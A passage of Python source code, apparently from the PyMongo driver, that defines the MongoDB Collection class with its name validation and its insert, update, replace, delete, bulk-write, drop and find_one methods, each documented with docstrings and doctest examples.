read_preference=None, write_concern=None, read_concern=None,
session=None, **kwargs):
"""Get / create a Mongo collection.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
collection name. Any additional keyword arguments will be used
as options passed to the create command. See
:meth:`~pymongo.database.Database.create_collection` for valid
options.
If `create` is ``True``, `collation` is specified, or any additional
keyword arguments are present, a ``create`` command will be
sent, using ``session`` if specified. Otherwise, a ``create`` command
will not be sent and the collection will be created implicitly on first
use. The optional ``session`` argument is *only* used for the ``create``
command, it is not associated with the collection afterward.
:Parameters:
- `database`: the database to get a collection from
- `name`: the name of the collection to get
- `create` (optional): if ``True``, force collection
creation even without options being set
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) database.codec_options is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) database.read_preference is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) database.write_concern is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) database.read_concern is used.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. If a collation is provided,
it will be passed to the create collection command. This option is
only supported on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession` that is used with
the create collection command
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.2
Added the read_concern option.
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
Removed the uuid_subtype attribute.
:class:`~pymongo.collection.Collection` no longer returns an
instance of :class:`~pymongo.collection.Collection` for attribute
names with leading underscores. You must use dict-style lookups
instead::
collection['__my_collection__']
Not:
collection.__my_collection__
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionadded:: 2.1
uuid_subtype attribute
.. mongodoc:: collections
"""
super(Collection, self).__init__(
codec_options or database.codec_options,
read_preference or database.read_preference,
write_concern or database.write_concern,
read_concern or database.read_concern)
if not isinstance(name, string_type):
raise TypeError("name must be an instance "
"of %s" % (string_type.__name__,))
if not name or ".." in name:
raise InvalidName("collection names cannot be empty")
if "$" in name and not (name.startswith("oplog.$main") or
name.startswith("$cmd")):
raise InvalidName("collection names must not "
"contain '$': %r" % name)
if name[0] == "." or name[-1] == ".":
raise InvalidName("collection names must not start "
"or end with '.': %r" % name)
if "\x00" in name:
raise InvalidName("collection names must not contain the "
"null character")
collation = validate_collation_or_none(kwargs.pop('collation', None))
self.__database = database
self.__name = _unicode(name)
self.__full_name = _UJOIN % (self.__database.name, self.__name)
if create or kwargs or collation:
self.__create(kwargs, collation, session)
self.__write_response_codec_options = self.codec_options._replace(
unicode_decode_error_handler='replace',
document_class=dict)
def _socket_for_reads(self, session):
return self.__database.client._socket_for_reads(
self._read_preference_for(session))
def _socket_for_primary_reads(self, session):
read_pref = ((session and session._txn_read_preference())
or ReadPreference.PRIMARY)
return self.__database.client._socket_for_reads(read_pref), read_pref
def _socket_for_writes(self):
return self.__database.client._socket_for_writes()
def _command(self, sock_info, command, slave_ok=False,
read_preference=None,
codec_options=None, check=True, allowable_errors=None,
read_concern=None,
write_concern=None,
collation=None,
session=None,
retryable_write=False):
"""Internal command helper.
:Parameters:
- `sock_info` - A SocketInfo instance.
- `command` - The command itself, as a SON instance.
- `slave_ok`: whether to set the SlaveOkay wire protocol bit.
- `codec_options` (optional) - An instance of
:class:`~bson.codec_options.CodecOptions`.
- `check`: raise OperationFailure if there are errors
- `allowable_errors`: errors to ignore if `check` is True
- `read_concern` (optional) - An instance of
:class:`~pymongo.read_concern.ReadConcern`.
- `write_concern`: An instance of
:class:`~pymongo.write_concern.WriteConcern`. This option is only
valid for MongoDB 3.4 and above.
- `collation` (optional) - An instance of
:class:`~pymongo.collation.Collation`.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
The result document.
"""
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
self.__database.name,
command,
slave_ok,
read_preference or self._read_preference_for(session),
codec_options or self.codec_options,
check,
allowable_errors,
read_concern=read_concern,
write_concern=write_concern,
parse_write_concern_error=True,
collation=collation,
session=s,
client=self.__database.client,
retryable_write=retryable_write)
def __create(self, options, collation, session):
"""Sends a create command with the given options.
"""
cmd = SON([("create", self.__name)])
if options:
if "size" in options:
options["size"] = float(options["size"])
cmd.update(options)
with self._socket_for_writes() as sock_info:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
write_concern=self._write_concern_for(session),
collation=collation, session=session)
def __getattr__(self, name):
"""Get a sub-collection of this collection by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
if name.startswith('_'):
full_name = _UJOIN % (self.__name, name)
raise AttributeError(
"Collection has no attribute %r. To access the %s"
" collection, use database['%s']." % (
name, full_name, full_name))
return self.__getitem__(name)
def __getitem__(self, name):
return Collection(self.__database,
_UJOIN % (self.__name, name),
False,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
def __repr__(self):
return "Collection(%r, %r)" % (self.__database, self.__name)
def __eq__(self, other):
if isinstance(other, Collection):
return (self.__database == other.database and
self.__name == other.name)
return NotImplemented
def __ne__(self, other):
return not self == other
@property
def full_name(self):
"""The full name of this :class:`Collection`.
The full name is of the form `database_name.collection_name`.
"""
return self.__full_name
@property
def name(self):
"""The name of this :class:`Collection`."""
return self.__name
@property
def database(self):
"""The :class:`~pymongo.database.Database` that this
:class:`Collection` is a part of.
"""
return self.__database
def with_options(
self, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
"""Get a clone of this collection changing the specified settings.
>>> coll1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> coll2 = coll1.with_options(read_preference=ReadPreference.SECONDARY)
>>> coll1.read_preference
Primary()
>>> coll2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Collection`
is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Collection` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Collection`
is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) the :attr:`read_concern` of this :class:`Collection`
is used.
"""
return Collection(self.__database,
self.__name,
False,
codec_options or self.codec_options,
read_preference or self.read_preference,
write_concern or self.write_concern,
read_concern or self.read_concern)
def initialize_unordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an unordered batch of write operations.
Operations will be performed on the server in arbitrary order,
possibly in parallel. All operations will be attempted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`unordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_unordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, False, bypass_document_validation)
def initialize_ordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an ordered batch of write operations.
Operations will be performed on the server serially, in the
order provided. If an error occurs all remaining operations
are aborted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`ordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_ordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, True, bypass_document_validation)
def bulk_write(self, requests, ordered=True,
bypass_document_validation=False, session=None):
"""Send a batch of write operations to the server.
Requests are passed as a list of write operation instances (
:class:`~pymongo.operations.InsertOne`,
:class:`~pymongo.operations.UpdateOne`,
:class:`~pymongo.operations.UpdateMany`,
:class:`~pymongo.operations.ReplaceOne`,
:class:`~pymongo.operations.DeleteOne`, or
:class:`~pymongo.operations.DeleteMany`).
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634ef')}
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
>>> # DeleteMany, UpdateOne, and UpdateMany are also available.
...
>>> from pymongo import InsertOne, DeleteOne, ReplaceOne
>>> requests = [InsertOne({'y': 1}), DeleteOne({'x': 1}),
... ReplaceOne({'w': 1}, {'z': 1}, upsert=True)]
>>> result = db.test.bulk_write(requests)
>>> result.inserted_count
1
>>> result.deleted_count
1
>>> result.modified_count
0
>>> result.upserted_ids
{2: ObjectId('54f62ee28891e756a6e1abd5')}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
{u'y': 1, u'_id': ObjectId('54f62ee2fba5226811f634f1')}
{u'z': 1, u'_id': ObjectId('54f62ee28891e756a6e1abd5')}
:Parameters:
- `requests`: A list of write operations (see examples above).
- `ordered` (optional): If ``True`` (the default) requests will be
performed on the server serially, in the order provided. If an error
occurs all remaining operations are aborted. If ``False`` requests
will be performed on the server in arbitrary order, possibly in
parallel, and all operations will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.BulkWriteResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_list("requests", requests)
blk = _Bulk(self, ordered, bypass_document_validation)
for request in requests:
try:
request._add_to_bulk(blk)
except AttributeError:
raise TypeError("%r is not a valid request" % (request,))
write_concern = self._write_concern_for(session)
bulk_api_result = blk.execute(write_concern, session)
if bulk_api_result is not None:
return BulkWriteResult(bulk_api_result, True)
return BulkWriteResult({}, False)
def _legacy_write(self, sock_info, name, cmd, op_id,
bypass_doc_val, func, *args):
"""Internal legacy unacknowledged write helper."""
# Cannot have both unacknowledged write and bypass document validation.
if bypass_doc_val and sock_info.max_wire_version >= 4:
raise OperationFailure("Cannot set bypass_document_validation with"
" unacknowledged write concern")
listeners = self.database.client._event_listeners
publish = listeners.enabled_for_commands
if publish:
start = datetime.datetime.now()
args = args + (sock_info.compression_context,)
rqst_id, msg, max_size = func(*args)
if publish:
duration = datetime.datetime.now() - start
listeners.publish_command_start(
cmd, self.__database.name, rqst_id, sock_info.address, op_id)
start = datetime.datetime.now()
try:
result = sock_info.legacy_write(rqst_id, msg, max_size, False)
except Exception as exc:
if publish:
dur = (datetime.datetime.now() - start) + duration
if isinstance(exc, OperationFailure):
details = exc.details
# Succeed if GLE was successful and this is a write error.
if details.get("ok") and "n" in details:
reply = message._convert_write_result(
name, cmd, details)
listeners.publish_command_success(
dur, reply, name, rqst_id, sock_info.address, op_id)
raise
else:
details = message._convert_exception(exc)
listeners.publish_command_failure(
dur, details, name, rqst_id, sock_info.address, op_id)
raise
if publish:
if result is not None:
reply = message._convert_write_result(name, cmd, result)
else:
# Comply with APM spec.
reply = {'ok': 1}
duration = (datetime.datetime.now() - start) + duration
listeners.publish_command_success(
duration, reply, name, rqst_id, sock_info.address, op_id)
return result
def _insert_one(
self, doc, ordered,
check_keys, manipulate, write_concern, op_id, bypass_doc_val,
session):
"""Internal helper for inserting a single document."""
if manipulate:
doc = self.__database._apply_incoming_manipulators(doc, self)
if not isinstance(doc, RawBSONDocument) and '_id' not in doc:
doc['_id'] = ObjectId()
doc = self.__database._apply_incoming_copying_manipulators(doc,
self)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
command = SON([('insert', self.name),
('ordered', ordered),
('documents', [doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
def _insert_command(session, sock_info, retryable_write):
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_INSERT.
return self._legacy_write(
sock_info, 'insert', command, op_id,
bypass_doc_val, message.insert, self.__full_name,
[doc], check_keys, False, write_concern.document, False,
self.__write_response_codec_options)
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
check_keys=check_keys,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
self.__database.client._retryable_write(
acknowledged, _insert_command, session)
if not isinstance(doc, RawBSONDocument):
return doc.get('_id')
def _insert(self, docs, ordered=True, check_keys=True,
manipulate=False, write_concern=None, op_id=None,
bypass_doc_val=False, session=None):
"""Internal insert helper."""
if isinstance(docs, abc.Mapping):
return self._insert_one(
docs, ordered, check_keys, manipulate, write_concern, op_id,
bypass_doc_val, session)
ids = []
if manipulate:
def gen():
"""Generator that applies SON manipulators to each document
and adds _id if necessary.
"""
_db = self.__database
for doc in docs:
# Apply user-configured SON manipulators. This order of
# operations is required for backwards compatibility,
# see PYTHON-709.
doc = _db._apply_incoming_manipulators(doc, self)
if not (isinstance(doc, RawBSONDocument) or '_id' in doc):
doc['_id'] = ObjectId()
doc = _db._apply_incoming_copying_manipulators(doc, self)
ids.append(doc['_id'])
yield doc
else:
def gen():
"""Generator that only tracks existing _ids."""
for doc in docs:
# Don't inflate RawBSONDocument by touching fields.
if not isinstance(doc, RawBSONDocument):
ids.append(doc.get('_id'))
yield doc
write_concern = write_concern or self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_doc_val)
blk.ops = [(message._INSERT, doc) for doc in gen()]
try:
blk.execute(write_concern, session=session)
except BulkWriteError as bwe:
_raise_last_error(bwe.details)
return ids
def insert_one(self, document, bypass_document_validation=False,
session=None):
"""Insert a single document.
>>> db.test.count_documents({'x': 1})
0
>>> result = db.test.insert_one({'x': 1})
>>> result.inserted_id
ObjectId('54f112defba522406c9cc208')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f112defba522406c9cc208')}
:Parameters:
- `document`: The document to insert. Must be a mutable mapping
type. If the document does not have an _id field one will be
added automatically.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.InsertOneResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_document_type("document", document)
if not (isinstance(document, RawBSONDocument) or "_id" in document):
document["_id"] = ObjectId()
write_concern = self._write_concern_for(session)
return InsertOneResult(
self._insert(document,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
session=session),
write_concern.acknowledged)
def insert_many(self, documents, ordered=True,
bypass_document_validation=False, session=None):
"""Insert an iterable of documents.
>>> db.test.count_documents({})
0
>>> result = db.test.insert_many([{'x': i} for i in range(2)])
>>> result.inserted_ids
[ObjectId('54f113fffba522406c9cc20e'), ObjectId('54f113fffba522406c9cc20f')]
>>> db.test.count_documents({})
2
:Parameters:
- `documents`: A iterable of documents to insert.
- `ordered` (optional): If ``True`` (the default) documents will be
inserted on the server serially, in the order provided. If an error
occurs all remaining inserts are aborted. If ``False``, documents
will be inserted on the server in arbitrary order, possibly in
parallel, and all document inserts will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.InsertManyResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
if not isinstance(documents, abc.Iterable) or not documents:
raise TypeError("documents must be a non-empty list")
inserted_ids = []
def gen():
"""A generator that validates documents and handles _ids."""
for document in documents:
common.validate_is_document_type("document", document)
if not isinstance(document, RawBSONDocument):
if "_id" not in document:
document["_id"] = ObjectId()
inserted_ids.append(document["_id"])
yield (message._INSERT, document)
write_concern = self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_document_validation)
blk.ops = [doc for doc in gen()]
blk.execute(write_concern, session=session)
return InsertManyResult(inserted_ids, write_concern.acknowledged)
def _update(self, sock_info, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None, retryable_write=False):
"""Internal update / replace helper."""
common.validate_boolean("upsert", upsert)
if manipulate:
document = self.__database._fix_incoming(document, self)
collation = validate_collation_or_none(collation)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
update_doc = SON([('q', criteria),
('u', document),
('multi', multi),
('upsert', upsert)])
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
update_doc['collation'] = collation
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use array_filters.')
elif not acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged writes.')
else:
update_doc['arrayFilters'] = array_filters
command = SON([('update', self.name),
('ordered', ordered),
('updates', [update_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_UPDATE.
return self._legacy_write(
sock_info, 'update', command, op_id,
bypass_doc_val, message.update, self.__full_name, upsert,
multi, criteria, document, False, write_concern.document,
check_keys, self.__write_response_codec_options)
# Update command.
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
# The command result has to be published for APM unmodified
# so we make a shallow copy here before adding updatedExisting.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write).copy()
_check_write_command_response(result)
# Add the updatedExisting field for compatibility.
if result.get('n') and 'upserted' not in result:
result['updatedExisting'] = True
else:
result['updatedExisting'] = False
# MongoDB >= 2.6.0 returns the upsert _id in an array
# element. Break it out for backward compatibility.
if 'upserted' in result:
result['upserted'] = result['upserted'][0]['_id']
if not acknowledged:
return None
return result
def _update_retryable(
self, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None):
"""Internal update / replace helper."""
def _update(session, sock_info, retryable_write):
return self._update(
sock_info, criteria, document, upsert=upsert,
check_keys=check_keys, multi=multi, manipulate=manipulate,
write_concern=write_concern, op_id=op_id, ordered=ordered,
bypass_doc_val=bypass_doc_val, collation=collation,
array_filters=array_filters, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_update, session)
def replace_one(self, filter, replacement, upsert=False,
bypass_document_validation=False, collation=None,
session=None):
"""Replace a single document matching the filter.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
>>> result = db.test.replace_one({'x': 1}, {'y': 1})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
The *upsert* option can be used to insert a new document if a matching
document does not exist.
>>> result = db.test.replace_one({'x': 1}, {'x': 1}, True)
>>> result.matched_count
0
>>> result.modified_count
0
>>> result.upserted_id
ObjectId('54f11e5c8891e756a6e1abd4')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f11e5c8891e756a6e1abd4')}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The new document.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_replace(replacement)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, replacement, upsert,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, session=session),
write_concern.acknowledged)
def update_one(self, filter, update, upsert=False,
bypass_document_validation=False,
collation=None, array_filters=None, session=None):
"""Update a single document matching the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_one({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added the `array_filters` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def update_many(self, filter, update, upsert=False, array_filters=None,
bypass_document_validation=False, collation=None,
session=None):
"""Update one or more documents that match the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_many({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
3
>>> result.modified_count
3
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 4, u'_id': 1}
{u'x': 4, u'_id': 2}
:Parameters:
- `filter`: A query that matches the documents to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation` (optional): If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``array_filters`` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False, multi=True,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def drop(self, session=None):
"""Alias for :meth:`~pymongo.database.Database.drop_collection`.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
The following two calls are equivalent:
>>> db.foo.drop()
>>> db.drop_collection("foo")
.. versionchanged:: 3.7
:meth:`drop` now respects this :class:`Collection`'s :attr:`write_concern`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
dbo.drop_collection(self.__name, session=session)
def _delete(
self, sock_info, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None, retryable_write=False):
"""Internal delete helper."""
common.validate_is_mapping("filter", criteria)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
delete_doc = SON([('q', criteria),
('limit', int(not multi))])
collation = validate_collation_or_none(collation)
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
delete_doc['collation'] = collation
command = SON([('delete', self.name),
('ordered', ordered),
('deletes', [delete_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_DELETE.
return self._legacy_write(
sock_info, 'delete', command, op_id,
False, message.delete, self.__full_name, criteria,
False, write_concern.document,
self.__write_response_codec_options,
int(not multi))
# Delete command.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
return result
def _delete_retryable(
self, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None):
"""Internal delete helper."""
def _delete(session, sock_info, retryable_write):
return self._delete(
sock_info, criteria, multi,
write_concern=write_concern, op_id=op_id, ordered=ordered,
collation=collation, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_delete, session)
def delete_one(self, filter, collation=None, session=None):
"""Delete a single document matching the filter.
>>> db.test.count_documents({'x': 1})
3
>>> result = db.test.delete_one({'x': 1})
>>> result.deleted_count
1
>>> db.test.count_documents({'x': 1})
2
:Parameters:
- `filter`: A query that matches the document to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, False,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def delete_many(self, filter, collation=None, session=None):
"""Delete one or more documents matching the filter.
>>> db.test.count_documents({'x': 1})
3
>>> result = db.test.delete_many({'x': 1})
>>> result.deleted_count
3
>>> db.test.count_documents({'x': 1})
0
:Parameters:
- `filter`: A query that matches the documents to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, True,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def find_one(self, filter=None, *args, **kwargs):
"""Get a single document from the database.
All arguments to :meth:`find` are also valid arguments for
:meth:`find_one`, although any `limit` argument will be
ignored. Returns a single document, or ``None`` if no matching
document is found.
The :meth:`find_one` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a dictionary specifying
the query to be performed OR any other type to be used as
the value for a query for ``"_id"``.
- `*args` (optional): any additional positional arguments
are the same as the arguments to :meth:`find`.
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to :meth:`find`.
>>> collection.find_one(max_time_ms=100)
"""
if (filter is not None and not
isinstance(filter, abc.Mapping)):
filter = {"_id": filter}
cursor = self.find(filter, *args, **kwargs)
for result in cursor.limit(-1):
return result
return None
def find(self, *args, **kwargs):
"""Query the database.
The `filter` argument is a prototype document that all results
must match. For example:
>>> db.test.find({"hello": "world"})
only matches documents that have a key "hello" with value
"world". Matches can have other keys *in addition* to
"hello". The `projection` argument is used to specify a subset
of fields that should be included in the result documents. By
limiting results to a certain subset of fields you can cut
down on network traffic and decoding time.
